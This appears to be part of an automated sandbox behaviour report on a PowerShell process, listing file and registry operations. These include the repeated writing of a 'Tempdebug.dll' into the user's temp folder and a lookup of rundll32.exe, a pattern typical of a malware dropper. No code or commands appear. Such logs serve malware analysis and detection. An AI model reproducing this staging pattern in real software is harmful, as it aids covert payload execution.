| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
7 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
6 | |
| Create | CONIN$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
7 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | type = file_type |
|
2 | |
| Get Info | C:\Windows\system32\rundll32.exe | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Read | CONIN$ | size = 8192 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 4096 |
|
9 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 62910 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 8516 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 7260 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 49368 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 8712 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 6068 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 64344 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 7064 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 19656 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 5808 |
|
2 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 65536 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 12872 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 46188 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 13068 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 64604 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 17228 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 4356 |
|
1 | |
| Write | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Tempdebug.dll | size = 25226 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 4 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 16 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 48 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 28 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 55 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 | |
| Write | CONOUT$ | size = 37 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Environment |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
9 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | ||
| Open Key | HKEY_CURRENT_USER |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
